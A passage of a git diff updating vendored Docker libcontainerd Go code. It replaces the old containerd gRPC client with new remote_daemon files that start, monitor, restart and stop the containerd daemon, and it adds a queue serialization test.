-type processCommon struct { - client *client - - // containerID is the Container ID - containerID string - - // friendlyName is an identifier for the process (or `InitFriendlyName` - // for the first process) - friendlyName string - - // systemPid is the PID of the main container process - systemPid uint32 -} diff --git a/vendor/github.com/docker/docker/libcontainerd/process_unix.go b/vendor/github.com/docker/docker/libcontainerd/process_unix.go deleted file mode 100644 index 506fca6e11..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/process_unix.go +++ /dev/null @@ -1,107 +0,0 @@ -// +build linux solaris - -package libcontainerd - -import ( - "io" - "io/ioutil" - "os" - "path/filepath" - goruntime "runtime" - "strings" - - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/tonistiigi/fifo" - "golang.org/x/net/context" - "golang.org/x/sys/unix" -) - -var fdNames = map[int]string{ - unix.Stdin: "stdin", - unix.Stdout: "stdout", - unix.Stderr: "stderr", -} - -// process keeps the state for both main container process and exec process. -type process struct { - processCommon - - // Platform specific fields are below here. 
- dir string -} - -func (p *process) openFifos(ctx context.Context, terminal bool) (pipe *IOPipe, err error) { - if err := os.MkdirAll(p.dir, 0700); err != nil { - return nil, err - } - - io := &IOPipe{} - - io.Stdin, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdin), unix.O_WRONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) - if err != nil { - return nil, err - } - - defer func() { - if err != nil { - io.Stdin.Close() - } - }() - - io.Stdout, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdout), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) - if err != nil { - return nil, err - } - - defer func() { - if err != nil { - io.Stdout.Close() - } - }() - - if goruntime.GOOS == "solaris" || !terminal { - // For Solaris terminal handling is done exclusively by the runtime therefore we make no distinction - // in the processing for terminal and !terminal cases. - io.Stderr, err = fifo.OpenFifo(ctx, p.fifo(unix.Stderr), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) - if err != nil { - return nil, err - } - defer func() { - if err != nil { - io.Stderr.Close() - } - }() - } else { - io.Stderr = ioutil.NopCloser(emptyReader{}) - } - - return io, nil -} - -func (p *process) sendCloseStdin() error { - _, err := p.client.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{ - Id: p.containerID, - Pid: p.friendlyName, - CloseStdin: true, - }) - if err != nil && (strings.Contains(err.Error(), "container not found") || strings.Contains(err.Error(), "process not found")) { - return nil - } - return err -} - -func (p *process) closeFifos(io *IOPipe) { - io.Stdin.Close() - io.Stdout.Close() - io.Stderr.Close() -} - -type emptyReader struct{} - -func (r emptyReader) Read(b []byte) (int, error) { - return 0, io.EOF -} - -func (p *process) fifo(index int) string { - return filepath.Join(p.dir, p.friendlyName+"-"+fdNames[index]) -} diff --git a/vendor/github.com/docker/docker/libcontainerd/process_windows.go 
b/vendor/github.com/docker/docker/libcontainerd/process_windows.go index 57ecc948d0..8cdf1daca8 100644 --- a/vendor/github.com/docker/docker/libcontainerd/process_windows.go +++ b/vendor/github.com/docker/docker/libcontainerd/process_windows.go @@ -1,4 +1,4 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import ( "io" @@ -8,17 +8,6 @@ import ( "github.com/docker/docker/pkg/ioutils" ) -// process keeps the state for both main container process and exec process. -type process struct { - processCommon - - // Platform specific fields are below here. - - // commandLine is to support returning summary information for docker top - commandLine string - hcsProcess hcsshim.Process -} - type autoClosingReader struct { io.ReadCloser sync.Once @@ -26,7 +15,7 @@ type autoClosingReader struct { func (r *autoClosingReader) Read(b []byte) (n int, err error) { n, err = r.ReadCloser.Read(b) - if err == io.EOF { + if err != nil { r.Once.Do(func() { r.ReadCloser.Close() }) } return @@ -49,3 +38,7 @@ func createStdInCloser(pipe io.WriteCloser, process hcsshim.Process) io.WriteClo return nil }) } + +func (p *process) Cleanup() error { + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/queue_unix.go b/vendor/github.com/docker/docker/libcontainerd/queue.go similarity index 70% rename from vendor/github.com/docker/docker/libcontainerd/queue_unix.go rename to vendor/github.com/docker/docker/libcontainerd/queue.go index b848b9872b..207722c441 100644 --- a/vendor/github.com/docker/docker/libcontainerd/queue_unix.go +++ b/vendor/github.com/docker/docker/libcontainerd/queue.go @@ -1,6 +1,4 @@ -// +build linux solaris - -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import "sync" @@ -27,5 +25,11 @@ func (q *queue) append(id string, f func()) { } f() close(done) + + q.Lock() + if q.fns[id] == done { + delete(q.fns, id) + } + q.Unlock() }() } diff --git 
a/vendor/github.com/docker/docker/libcontainerd/queue_test.go b/vendor/github.com/docker/docker/libcontainerd/queue_test.go new file mode 100644 index 0000000000..e13afca89a --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/queue_test.go @@ -0,0 +1,31 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "testing" + "time" + + "gotest.tools/assert" +) + +func TestSerialization(t *testing.T) { + var ( + q queue + serialization = 1 + ) + + q.append("aaa", func() { + //simulate a long time task + time.Sleep(10 * time.Millisecond) + assert.Equal(t, serialization, 1) + serialization = 2 + }) + q.append("aaa", func() { + assert.Equal(t, serialization, 2) + serialization = 3 + }) + q.append("aaa", func() { + assert.Equal(t, serialization, 3) + serialization = 4 + }) + time.Sleep(20 * time.Millisecond) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote.go b/vendor/github.com/docker/docker/libcontainerd/remote.go deleted file mode 100644 index 9031e3ae7d..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/remote.go +++ /dev/null @@ -1,20 +0,0 @@ -package libcontainerd - -// Remote on Linux defines the accesspoint to the containerd grpc API. -// Remote on Windows is largely an unimplemented interface as there is -// no remote containerd. -type Remote interface { - // Client returns a new Client instance connected with given Backend. - Client(Backend) (Client, error) - // Cleanup stops containerd if it was started by libcontainerd. - // Note this is not used on Windows as there is no remote containerd. - Cleanup() - // UpdateOptions allows various remote options to be updated at runtime. - UpdateOptions(...RemoteOption) error -} - -// RemoteOption allows to configure parameters of remotes. -// This is unused on Windows. 
-type RemoteOption interface { - Apply(Remote) error -} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon.go new file mode 100644 index 0000000000..cd2ac1ce4d --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon.go @@ -0,0 +1,344 @@ +// +build !windows + +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "context" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/BurntSushi/toml" + "github.com/containerd/containerd" + "github.com/containerd/containerd/services/server" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +const ( + maxConnectionRetryCount = 3 + healthCheckTimeout = 3 * time.Second + shutdownTimeout = 15 * time.Second + configFile = "containerd.toml" + binaryName = "docker-containerd" + pidFile = "docker-containerd.pid" +) + +type pluginConfigs struct { + Plugins map[string]interface{} `toml:"plugins"` +} + +type remote struct { + sync.RWMutex + server.Config + + daemonPid int + logger *logrus.Entry + + daemonWaitCh chan struct{} + clients []*client + shutdownContext context.Context + shutdownCancel context.CancelFunc + shutdown bool + + // Options + startDaemon bool + rootDir string + stateDir string + snapshotter string + pluginConfs pluginConfigs +} + +// New creates a fresh instance of libcontainerd remote. 
+func New(rootDir, stateDir string, options ...RemoteOption) (rem Remote, err error) { + defer func() { + if err != nil { + err = errors.Wrap(err, "Failed to connect to containerd") + } + }() + + r := &remote{ + rootDir: rootDir, + stateDir: stateDir, + Config: server.Config{ + Root: filepath.Join(rootDir, "daemon"), + State: filepath.Join(stateDir, "daemon"), + }, + pluginConfs: pluginConfigs{make(map[string]interface{})}, + daemonPid: -1, + logger: logrus.WithField("module", "libcontainerd"), + } + r.shutdownContext, r.shutdownCancel = context.WithCancel(context.Background()) + + rem = r + for _, option := range options { + if err = option.Apply(r); err != nil { + return + } + } + r.setDefaults() + + if err = system.MkdirAll(stateDir, 0700, ""); err != nil { + return + } + + if r.startDaemon { + os.Remove(r.GRPC.Address) + if err = r.startContainerd(); err != nil { + return + } + defer func() { + if err != nil { + r.Cleanup() + } + }() + } + + // This connection is just used to monitor the connection + client, err := containerd.New(r.GRPC.Address) + if err != nil { + return + } + if _, err := client.Version(context.Background()); err != nil { + system.KillProcess(r.daemonPid) + return nil, errors.Wrapf(err, "unable to get containerd version") + } + + go r.monitorConnection(client) + + return r, nil +} + +func (r *remote) NewClient(ns string, b Backend) (Client, error) { + c := &client{ + stateDir: r.stateDir, + logger: r.logger.WithField("namespace", ns), + namespace: ns, + backend: b, + containers: make(map[string]*container), + } + + rclient, err := containerd.New(r.GRPC.Address, containerd.WithDefaultNamespace(ns)) + if err != nil { + return nil, err + } + c.remote = rclient + + go c.processEventStream(r.shutdownContext) + + r.Lock() + r.clients = append(r.clients, c) + r.Unlock() + return c, nil +} + +func (r *remote) Cleanup() { + if r.daemonPid != -1 { + r.shutdownCancel() + r.stopDaemon() + } + + // cleanup some files + os.Remove(filepath.Join(r.stateDir, 
pidFile)) + + r.platformCleanup() +} + +func (r *remote) getContainerdPid() (int, error) { + pidFile := filepath.Join(r.stateDir, pidFile) + f, err := os.OpenFile(pidFile, os.O_RDWR, 0600) + if err != nil { + if os.IsNotExist(err) { + return -1, nil + } + return -1, err + } + defer f.Close() + + b := make([]byte, 8) + n, err := f.Read(b) + if err != nil && err != io.EOF { + return -1, err + } + + if n > 0 { + pid, err := strconv.ParseUint(string(b[:n]), 10, 64) + if err != nil { + return -1, err + } + if system.IsProcessAlive(int(pid)) { + return int(pid), nil + } + } + + return -1, nil +} + +func (r *remote) getContainerdConfig() (string, error) { + path := filepath.Join(r.stateDir, configFile) + f, err := os.OpenFile(path, os.O_CREATE|os.O_TRUNC|os.O_WRONLY, 0600) + if err != nil { + return "", errors.Wrapf(err, "failed to open containerd config file at %s", path) + } + defer f.Close() + + enc := toml.NewEncoder(f) + if err = enc.Encode(r.Config); err != nil { + return "", errors.Wrapf(err, "failed to encode general config") + } + if err = enc.Encode(r.pluginConfs); err != nil { + return "", errors.Wrapf(err, "failed to encode plugin configs") + } + + return path, nil +} + +func (r *remote) startContainerd() error { + pid, err := r.getContainerdPid() + if err != nil { + return err + } + + if pid != -1 { + r.daemonPid = pid + logrus.WithField("pid", pid). + Infof("libcontainerd: %s is still running", binaryName) + return nil + } + + configFile, err := r.getContainerdConfig() + if err != nil { + return err + } + + args := []string{"--config", configFile} + cmd := exec.Command(binaryName, args...) 
+ // redirect containerd logs to docker logs + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.SysProcAttr = containerdSysProcAttr() + // clear the NOTIFY_SOCKET from the env when starting containerd + cmd.Env = nil + for _, e := range os.Environ() { + if !strings.HasPrefix(e, "NOTIFY_SOCKET") { + cmd.Env = append(cmd.Env, e) + } + } + if err := cmd.Start(); err != nil { + return err + } + + r.daemonWaitCh = make(chan struct{}) + go func() { + // Reap our child when needed + if err := cmd.Wait(); err != nil { + r.logger.WithError(err).Errorf("containerd did not exit successfully") + } + close(r.daemonWaitCh) + }() + + r.daemonPid = cmd.Process.Pid + + err = ioutil.WriteFile(filepath.Join(r.stateDir, pidFile), []byte(fmt.Sprintf("%d", r.daemonPid)), 0660) + if err != nil { + system.KillProcess(r.daemonPid) + return errors.Wrap(err, "libcontainerd: failed to save daemon pid to disk") + } + + logrus.WithField("pid", r.daemonPid). + Infof("libcontainerd: started new %s process", binaryName) + + return nil +} + +func (r *remote) monitorConnection(monitor *containerd.Client) { + var transientFailureCount = 0 + + for { + select { + case <-r.shutdownContext.Done(): + r.logger.Info("stopping healthcheck following graceful shutdown") + monitor.Close() + return + case <-time.After(500 * time.Millisecond): + } + + ctx, cancel := context.WithTimeout(r.shutdownContext, healthCheckTimeout) + _, err := monitor.IsServing(ctx) + cancel() + if err == nil { + transientFailureCount = 0 + continue + } + + select { + case <-r.shutdownContext.Done(): + r.logger.Info("stopping healthcheck following graceful shutdown") + monitor.Close() + return + default: + } + + r.logger.WithError(err).WithField("binary", binaryName).Debug("daemon is not responding") + + if r.daemonPid == -1 { + continue + } + + transientFailureCount++ + if transientFailureCount < maxConnectionRetryCount || system.IsProcessAlive(r.daemonPid) { + continue + } + + transientFailureCount = 0 + if 
system.IsProcessAlive(r.daemonPid) { + r.logger.WithField("pid", r.daemonPid).Info("killing and restarting containerd") + // Try to get a stack trace + syscall.Kill(r.daemonPid, syscall.SIGUSR1) + <-time.After(100 * time.Millisecond) + system.KillProcess(r.daemonPid) + } + if r.daemonWaitCh != nil { + <-r.daemonWaitCh + } + + os.Remove(r.GRPC.Address) + if err := r.startContainerd(); err != nil { + r.logger.WithError(err).Error("failed restarting containerd") + continue + } + + if err := monitor.Reconnect(); err != nil { + r.logger.WithError(err).Error("failed connect to containerd") + continue + } + + var wg sync.WaitGroup + + for _, c := range r.clients { + wg.Add(1) + + go func(c *client) { + defer wg.Done() + c.logger.WithField("namespace", c.namespace).Debug("creating new containerd remote client") + if err := c.reconnect(); err != nil { + r.logger.WithError(err).Error("failed to connect to containerd") + // TODO: Better way to handle this? + // This *shouldn't* happen, but this could wind up where the daemon + // is not able to communicate with an eventually up containerd + } + }(c) + + wg.Wait() + } + } +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go new file mode 100644 index 0000000000..dc59eb8c14 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go @@ -0,0 +1,61 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "os" + "path/filepath" + "syscall" + "time" + + "github.com/containerd/containerd/defaults" + "github.com/docker/docker/pkg/system" +) + +const ( + sockFile = "docker-containerd.sock" + debugSockFile = "docker-containerd-debug.sock" +) + +func (r *remote) setDefaults() { + if r.GRPC.Address == "" { + r.GRPC.Address = filepath.Join(r.stateDir, sockFile) + } + if r.GRPC.MaxRecvMsgSize == 0 { + r.GRPC.MaxRecvMsgSize = defaults.DefaultMaxRecvMsgSize + } + if 
r.GRPC.MaxSendMsgSize == 0 { + r.GRPC.MaxSendMsgSize = defaults.DefaultMaxSendMsgSize + } + if r.Debug.Address == "" { + r.Debug.Address = filepath.Join(r.stateDir, debugSockFile) + } + if r.Debug.Level == "" { + r.Debug.Level = "info" + } + if r.OOMScore == 0 { + r.OOMScore = -999 + } + if r.snapshotter == "" { + r.snapshotter = "overlay" + } +} + +func (r *remote) stopDaemon() { + // Ask the daemon to quit + syscall.Kill(r.daemonPid, syscall.SIGTERM) + // Wait up to 15secs for it to stop + for i := time.Duration(0); i < shutdownTimeout; i += time.Second { + if !system.IsProcessAlive(r.daemonPid) { + break + } + time.Sleep(time.Second) + } + + if system.IsProcessAlive(r.daemonPid) { + r.logger.WithField("pid", r.daemonPid).Warn("daemon didn't stop within 15 secs, killing it") + syscall.Kill(r.daemonPid, syscall.SIGKILL) + } +} + +func (r *remote) platformCleanup() { + os.Remove(filepath.Join(r.stateDir, sockFile)) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go new file mode 100644 index 0000000000..d40e4c0c42 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go @@ -0,0 +1,141 @@ +// +build !windows + +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import "fmt" + +// WithRemoteAddr sets the external containerd socket to connect to. 
+func WithRemoteAddr(addr string) RemoteOption { + return rpcAddr(addr) +} + +type rpcAddr string + +func (a rpcAddr) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.GRPC.Address = string(a) + return nil + } + return fmt.Errorf("WithRemoteAddr option not supported for this remote") +} + +// WithRemoteAddrUser sets the uid and gid to create the RPC address with +func WithRemoteAddrUser(uid, gid int) RemoteOption { + return rpcUser{uid, gid} +} + +type rpcUser struct { + uid int + gid int +} + +func (u rpcUser) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.GRPC.UID = u.uid + remote.GRPC.GID = u.gid + return nil + } + return fmt.Errorf("WithRemoteAddr option not supported for this remote") +} + +// WithStartDaemon defines if libcontainerd should also run containerd daemon. +func WithStartDaemon(start bool) RemoteOption { + return startDaemon(start) +} + +type startDaemon bool + +func (s startDaemon) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.startDaemon = bool(s) + return nil + } + return fmt.Errorf("WithStartDaemon option not supported for this remote") +} + +// WithLogLevel defines which log level to starts containerd with. +// This only makes sense if WithStartDaemon() was set to true. 
+func WithLogLevel(lvl string) RemoteOption { + return logLevel(lvl) +} + +type logLevel string + +func (l logLevel) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.Debug.Level = string(l) + return nil + } + return fmt.Errorf("WithDebugLog option not supported for this remote") +} + +// WithDebugAddress defines at which location the debug GRPC connection +// should be made +func WithDebugAddress(addr string) RemoteOption { + return debugAddress(addr) +} + +type debugAddress string + +func (d debugAddress) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.Debug.Address = string(d) + return nil + } + return fmt.Errorf("WithDebugAddress option not supported for this remote") +} + +// WithMetricsAddress defines at which location the debug GRPC connection +// should be made +func WithMetricsAddress(addr string) RemoteOption { + return metricsAddress(addr) +} + +type metricsAddress string + +func (m metricsAddress) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.Metrics.Address = string(m) + return nil + } + return fmt.Errorf("WithMetricsAddress option not supported for this remote") +} + +// WithSnapshotter defines snapshotter driver should be used +func WithSnapshotter(name string) RemoteOption { + return snapshotter(name) +} + +type snapshotter string + +func (s snapshotter) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.snapshotter = string(s) + return nil + } + return fmt.Errorf("WithSnapshotter option not supported for this remote") +} + +// WithPlugin allow configuring a containerd plugin +// configuration values passed needs to be quoted if quotes are needed in +// the toml format. 
+func WithPlugin(name string, conf interface{}) RemoteOption { + return pluginConf{ + name: name, + conf: conf, + } +} + +type pluginConf struct { + // Name is the name of the plugin + name string + conf interface{} +} + +func (p pluginConf) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.pluginConfs.Plugins[p.name] = p.conf + return nil + } + return fmt.Errorf("WithPlugin option not supported for this remote") +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go new file mode 100644 index 0000000000..a820fb3894 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go @@ -0,0 +1,18 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import "fmt" + +// WithOOMScore defines the oom_score_adj to set for the containerd process. +func WithOOMScore(score int) RemoteOption { + return oomScore(score) +} + +type oomScore int + +func (o oomScore) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.OOMScore = int(o) + return nil + } + return fmt.Errorf("WithOOMScore option not supported for this remote") +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go new file mode 100644 index 0000000000..89342d7395 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go @@ -0,0 +1,50 @@ +// +build remote_daemon + +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "os" +) + +const ( + grpcPipeName = `\\.\pipe\docker-containerd-containerd` + debugPipeName = `\\.\pipe\docker-containerd-debug` +) + +func (r *remote) setDefaults() { + if r.GRPC.Address == "" { + r.GRPC.Address = grpcPipeName + } + if r.Debug.Address == "" { + r.Debug.Address = debugPipeName + } + if r.Debug.Level == "" { + 
r.Debug.Level = "info" + } + if r.snapshotter == "" { + r.snapshotter = "naive" // TODO(mlaventure): switch to "windows" once implemented + } +} + +func (r *remote) stopDaemon() { + p, err := os.FindProcess(r.daemonPid) + if err != nil { + r.logger.WithField("pid", r.daemonPid).Warn("could not find daemon process") + return + } + + if err = p.Kill(); err != nil { + r.logger.WithError(err).WithField("pid", r.daemonPid).Warn("could not kill daemon process") + return + } + + _, err = p.Wait() + if err != nil { + r.logger.WithError(err).WithField("pid", r.daemonPid).Warn("wait for daemon process") + return + } +} + +func (r *remote) platformCleanup() { + // Nothing to do +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_local.go b/vendor/github.com/docker/docker/libcontainerd/remote_local.go new file mode 100644 index 0000000000..8ea5198b87 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_local.go @@ -0,0 +1,59 @@ +// +build windows + +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "sync" + + "github.com/sirupsen/logrus" +) + +type remote struct { + sync.RWMutex + + logger *logrus.Entry + clients []*client + + // Options + rootDir string + stateDir string +} + +// New creates a fresh instance of libcontainerd remote. 
+func New(rootDir, stateDir string, options ...RemoteOption) (Remote, error) { + return &remote{ + logger: logrus.WithField("module", "libcontainerd"), + rootDir: rootDir, + stateDir: stateDir, + }, nil +} + +type client struct { + sync.Mutex + + rootDir string + stateDir string + backend Backend + logger *logrus.Entry + eventQ queue + containers map[string]*container +} + +func (r *remote) NewClient(ns string, b Backend) (Client, error) { + c := &client{ + rootDir: r.rootDir, + stateDir: r.stateDir, + backend: b, + logger: r.logger.WithField("namespace", ns), + containers: make(map[string]*container), + } + r.Lock() + r.clients = append(r.clients, c) + r.Unlock() + + return c, nil +} + +func (r *remote) Cleanup() { + // Nothing to do +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_unix.go b/vendor/github.com/docker/docker/libcontainerd/remote_unix.go deleted file mode 100644 index 64a28646be..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/remote_unix.go +++ /dev/null @@ -1,544 +0,0 @@ -// +build linux solaris - -package libcontainerd - -import ( - "fmt" - "io" - "io/ioutil" - "log" - "net" - "os" - "os/exec" - "path/filepath" - goruntime "runtime" - "strconv" - "strings" - "sync" - "syscall" - "time" - - "github.com/Sirupsen/logrus" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/docker/docker/pkg/locker" - sysinfo "github.com/docker/docker/pkg/system" - "github.com/docker/docker/utils" - "github.com/golang/protobuf/ptypes" - "github.com/golang/protobuf/ptypes/timestamp" - "golang.org/x/net/context" - "google.golang.org/grpc" - "google.golang.org/grpc/grpclog" - "google.golang.org/grpc/health/grpc_health_v1" - "google.golang.org/grpc/transport" -) - -const ( - maxConnectionRetryCount = 3 - containerdHealthCheckTimeout = 3 * time.Second - containerdShutdownTimeout = 15 * time.Second - containerdBinary = "docker-containerd" - containerdPidFilename = "docker-containerd.pid" - containerdSockFilename = 
"docker-containerd.sock" - containerdStateDir = "containerd" - eventTimestampFilename = "event.ts" -) - -type remote struct { - sync.RWMutex - apiClient containerd.APIClient - daemonPid int - stateDir string - rpcAddr string - startDaemon bool - closeManually bool - debugLog bool - rpcConn *grpc.ClientConn - clients []*client - eventTsPath string - runtime string - runtimeArgs []string - daemonWaitCh chan struct{} - liveRestore bool - oomScore int - restoreFromTimestamp *timestamp.Timestamp -} - -// New creates a fresh instance of libcontainerd remote. -func New(stateDir string, options ...RemoteOption) (_ Remote, err error) { - defer func() { - if err != nil { - err = fmt.Errorf("Failed to connect to containerd. Please make sure containerd is installed in your PATH or you have specified the correct address. Got error: %v", err) - } - }() - r := &remote{ - stateDir: stateDir, - daemonPid: -1, - eventTsPath: filepath.Join(stateDir, eventTimestampFilename), - } - for _, option := range options { - if err := option.Apply(r); err != nil { - return nil, err - } - } - - if err := sysinfo.MkdirAll(stateDir, 0700); err != nil { - return nil, err - } - - if r.rpcAddr == "" { - r.rpcAddr = filepath.Join(stateDir, containerdSockFilename) - } - - if r.startDaemon { - if err := r.runContainerdDaemon(); err != nil { - return nil, err - } - } - - // don't output the grpc reconnect logging - grpclog.SetLogger(log.New(ioutil.Discard, "", log.LstdFlags)) - dialOpts := append([]grpc.DialOption{grpc.WithInsecure()}, - grpc.WithDialer(func(addr string, timeout time.Duration) (net.Conn, error) { - return net.DialTimeout("unix", addr, timeout) - }), - ) - conn, err := grpc.Dial(r.rpcAddr, dialOpts...) 
- if err != nil { - return nil, fmt.Errorf("error connecting to containerd: %v", err) - } - - r.rpcConn = conn - r.apiClient = containerd.NewAPIClient(conn) - - // Get the timestamp to restore from - t := r.getLastEventTimestamp() - tsp, err := ptypes.TimestampProto(t) - if err != nil { - logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err) - } - r.restoreFromTimestamp = tsp - - go r.handleConnectionChange() - - if err := r.startEventsMonitor(); err != nil { - return nil, err - } - - return r, nil -} - -func (r *remote) UpdateOptions(options ...RemoteOption) error { - for _, option := range options { - if err := option.Apply(r); err != nil { - return err - } - } - return nil -} - -func (r *remote) handleConnectionChange() { - var transientFailureCount = 0 - - ticker := time.NewTicker(500 * time.Millisecond) - defer ticker.Stop() - healthClient := grpc_health_v1.NewHealthClient(r.rpcConn) - - for { - <-ticker.C - ctx, cancel := context.WithTimeout(context.Background(), containerdHealthCheckTimeout) - _, err := healthClient.Check(ctx, &grpc_health_v1.HealthCheckRequest{}) - cancel() - if err == nil { - continue - } - - logrus.Debugf("libcontainerd: containerd health check returned error: %v", err) - - if r.daemonPid != -1 { - if strings.Contains(err.Error(), "is closing") { - // Well, we asked for it to stop, just return - return - } - // all other errors are transient - // Reset state to be notified of next failure - transientFailureCount++ - if transientFailureCount >= maxConnectionRetryCount { - transientFailureCount = 0 - if utils.IsProcessAlive(r.daemonPid) { - utils.KillProcess(r.daemonPid) - } - <-r.daemonWaitCh - if err := r.runContainerdDaemon(); err != nil { //FIXME: Handle error - logrus.Errorf("libcontainerd: error restarting containerd: %v", err) - } - continue - } - } - } -} - -func (r *remote) Cleanup() { - if r.daemonPid == -1 { - return - } - r.closeManually = true - r.rpcConn.Close() - // Ask the daemon to quit - 
syscall.Kill(r.daemonPid, syscall.SIGTERM) - - // Wait up to 15secs for it to stop - for i := time.Duration(0); i < containerdShutdownTimeout; i += time.Second { - if !utils.IsProcessAlive(r.daemonPid) { - break - } - time.Sleep(time.Second) - } - - if utils.IsProcessAlive(r.daemonPid) { - logrus.Warnf("libcontainerd: containerd (%d) didn't stop within 15 secs, killing it\n", r.daemonPid) - syscall.Kill(r.daemonPid, syscall.SIGKILL) - } - - // cleanup some files - os.Remove(filepath.Join(r.stateDir, containerdPidFilename)) - os.Remove(filepath.Join(r.stateDir, containerdSockFilename)) -} - -func (r *remote) Client(b Backend) (Client, error) { - c := &client{ - clientCommon: clientCommon{ - backend: b, - containers: make(map[string]*container), - locker: locker.New(), - }, - remote: r, - exitNotifiers: make(map[string]*exitNotifier), - liveRestore: r.liveRestore, - } - - r.Lock() - r.clients = append(r.clients, c) - r.Unlock() - return c, nil -} - -func (r *remote) updateEventTimestamp(t time.Time) { - f, err := os.OpenFile(r.eventTsPath, syscall.O_CREAT|syscall.O_WRONLY|syscall.O_TRUNC, 0600) - if err != nil { - logrus.Warnf("libcontainerd: failed to open event timestamp file: %v", err) - return - } - defer f.Close() - - b, err := t.MarshalText() - if err != nil { - logrus.Warnf("libcontainerd: failed to encode timestamp: %v", err) - return - } - - n, err := f.Write(b) - if err != nil || n != len(b) { - logrus.Warnf("libcontainerd: failed to update event timestamp file: %v", err) - f.Truncate(0) - return - } -} - -func (r *remote) getLastEventTimestamp() time.Time { - t := time.Now() - - fi, err := os.Stat(r.eventTsPath) - if os.IsNotExist(err) || fi.Size() == 0 { - return t - } - - f, err := os.Open(r.eventTsPath) - if err != nil { - logrus.Warnf("libcontainerd: Unable to access last event ts: %v", err) - return t - } - defer f.Close() - - b := make([]byte, fi.Size()) - n, err := f.Read(b) - if err != nil || n != len(b) { - logrus.Warnf("libcontainerd: Unable to 
read last event ts: %v", err) - return t - } - - t.UnmarshalText(b) - - return t -} - -func (r *remote) startEventsMonitor() error { - // First, get past events - t := r.getLastEventTimestamp() - tsp, err := ptypes.TimestampProto(t) - if err != nil { - logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err) - } - er := &containerd.EventsRequest{ - Timestamp: tsp, - } - events, err := r.apiClient.Events(context.Background(), er, grpc.FailFast(false)) - if err != nil { - return err - } - go r.handleEventStream(events) - return nil -} - -func (r *remote) handleEventStream(events containerd.API_EventsClient) { - for { - e, err := events.Recv() - if err != nil { - if grpc.ErrorDesc(err) == transport.ErrConnClosing.Desc && - r.closeManually { - // ignore error if grpc remote connection is closed manually - return - } - logrus.Errorf("libcontainerd: failed to receive event from containerd: %v", err) - go r.startEventsMonitor() - return - } - - logrus.Debugf("libcontainerd: received containerd event: %#v", e) - - var container *container - var c *client - r.RLock() - for _, c = range r.clients { - container, err = c.getContainer(e.Id) - if err == nil { - break - } - } - r.RUnlock() - if container == nil { - logrus.Warnf("libcontainerd: unknown container %s", e.Id) - continue - } - - if err := container.handleEvent(e); err != nil { - logrus.Errorf("libcontainerd: error processing state change for %s: %v", e.Id, err) - } - - tsp, err := ptypes.Timestamp(e.Timestamp) - if err != nil { - logrus.Errorf("libcontainerd: failed to convert event timestamp: %q", err) - continue - } - - r.updateEventTimestamp(tsp) - } -} - -func (r *remote) runContainerdDaemon() error { - pidFilename := filepath.Join(r.stateDir, containerdPidFilename) - f, err := os.OpenFile(pidFilename, os.O_RDWR|os.O_CREATE, 0600) - if err != nil { - return err - } - defer f.Close() - - // File exist, check if the daemon is alive - b := make([]byte, 8) - n, err := f.Read(b) - if err != nil && err != 
